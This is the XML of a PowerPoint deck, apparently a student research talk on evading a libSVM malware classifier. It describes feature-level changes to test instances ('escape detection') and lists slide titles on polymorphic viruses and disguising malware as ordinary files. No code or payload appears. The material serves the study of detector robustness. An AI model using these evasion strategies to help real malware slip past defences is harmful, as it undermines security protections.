              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>model and test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Modify the data in the test set and redo testing using original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>libSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Compare the performance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16652049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Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1596325"/>
            <a:ext cx="8915400" cy="44404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a:t>Data preprocessing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>libSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>train</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>model and test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify the data in the test set and redo testing using original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Compare the performance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17070565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t>Data Preprocessing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
            </a:b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0194" y="1471613"/>
            <a:ext cx="10843024" cy="454017"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217596" y="2085975"/>
            <a:ext cx="9149698" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="90000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Instance example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0"/>
              <a:t>+1 1:1 3:1 5:1 7:1 9:1 11:1 26:1 30:1 33:1 37:1 39:1 42:1 44:1 50:1 53:1 57:1 59:1 67:1 79:1 82:1 84:1 92:1 98:1 102:1 107:1 111:1 113:1 126:1 128:1 132:1 140:1 154:1 157:1 164:1 168:1 171:1 186:1 189:1 193:1 213:1 219:1 227:1 231:1 238:1 258:1 268:1 275:1 279:1 282:1 291:1 302:1 318:1 331:1 339:1 362:1 367:1 369:1 378:1 388:1 400:1 409:1 412:1 417:1 419:1 427:1 431:1 446:1 449:1 455:1 457:1 466:1 476:1 491:1 497:1 500:1 503:1  -1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217596" y="5313938"/>
            <a:ext cx="9149698" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>All attributes are binary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ttributes with FALSE value are not shown</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1860577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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Randomly picking instances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>80% as Training set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>20% as Test set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Remove the “-1” at the end of each instance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1780812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training</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1854921" y="2133600"/>
            <a:ext cx="10018424" cy="3777622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Assumption: Known model, modification on test set to escape detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Test with original test set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Accuracy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>98.6667% (74/75)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2646364" y="3308028"/>
            <a:ext cx="1828800" cy="107721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3200" dirty="0" smtClean="0"/>
              <a:t>Training Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8728076" y="3308028"/>
            <a:ext cx="1828800" cy="107721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ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475164" y="3846637"/>
            <a:ext cx="4252912"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981702" y="3308028"/>
            <a:ext cx="1250663" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>LibSVM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13906382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test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(TODO: Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>into workflow)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="2133600"/>
            <a:ext cx="8915400" cy="4110038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Choose 1 attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Add the chosen attribute if not present in an instance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Test “new test set” with the trained model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Compare with original accuracy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> escaped detection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Exhaust all 530 attributes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="563211686"/>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3556</TotalTime>
  <Words>997</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>176</Paragraphs>
  <Slides>29</Slides>
  <Notes>9</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Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>幼圆</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wisp</vt:lpstr>
      <vt:lpstr>Evading the Machine Learning Detector: A Virus’ Perspective</vt:lpstr>
      <vt:lpstr>Problem Description</vt:lpstr>
      <vt:lpstr>Malicious Executable Dataset</vt:lpstr>
      <vt:lpstr>Methods</vt:lpstr>
      <vt:lpstr>Methods</vt:lpstr>
      <vt:lpstr>Data Preprocessing </vt:lpstr>
      <vt:lpstr>Data Preprocessing</vt:lpstr>
      <vt:lpstr>Model training</vt:lpstr>
      <vt:lpstr>Naïve test (TODO: Change text into workflow)</vt:lpstr>
      <vt:lpstr>Naïve test: Adding Single Attribute</vt:lpstr>
      <vt:lpstr>Instance modification strategy (1)</vt:lpstr>
      <vt:lpstr>Instance modification strategy (2)</vt:lpstr>
      <vt:lpstr>Test Result: Adding Highest N Attributes</vt:lpstr>
      <vt:lpstr>Test Result: Deleting Lowest N Attributes</vt:lpstr>
      <vt:lpstr>Test Result: Combined</vt:lpstr>
      <vt:lpstr>vs. Existing Hiding Schemes</vt:lpstr>
      <vt:lpstr>Disguise as Popular File Formats or Programs</vt:lpstr>
      <vt:lpstr>Polymorphic Virus</vt:lpstr>
      <vt:lpstr>Other Existing Hiding Schemes</vt:lpstr>
      <vt:lpstr>Conclusion &amp; Future Work</vt:lpstr>
      <vt:lpstr>Related Work</vt:lpstr>
      <vt:lpstr>Related Work</vt:lpstr>
      <vt:lpstr>Methods</vt:lpstr>
      <vt:lpstr>Originality</vt:lpstr>
      <vt:lpstr>Originality</vt:lpstr>
      <vt:lpstr>Challenge</vt:lpstr>
      <vt:lpstr>Challenge</vt:lpstr>
      <vt:lpstr>Challenge</vt:lpstr>
      <vt:lpstr>Evaluation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185</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-22T19:51:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-12T20:04:25Z</dcterms:modified>
</cp:coreProperties>
</file>